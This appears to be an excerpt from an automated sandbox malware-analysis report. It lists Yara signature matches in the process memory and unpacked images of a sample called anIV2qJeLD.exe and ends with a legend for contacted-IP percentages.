Source: Yara match File source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: PING.EXE PID: 2280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 5844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 6656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1380, type: MEMORYSTR
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.48394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.anIV2qJeLD.exe.3c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.4864ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.973836822.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.824591176.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753488992.00000000047BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.978653062.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1012362960.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1042231528.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.822930430.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.933683599.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.934438300.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.885186030.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.972065324.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.899852132.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1024798927.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.925739991.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753518401.0000000004839000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1039859823.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.895713343.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.970372197.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.887028110.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.947593693.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.936725813.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.974956334.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.825845900.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.970221418.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.961075351.0000000004299000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.883404432.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.905548648.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.968828960.00000000044C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.942244917.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918958280.00000168AA1CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1037934763.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1018627233.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs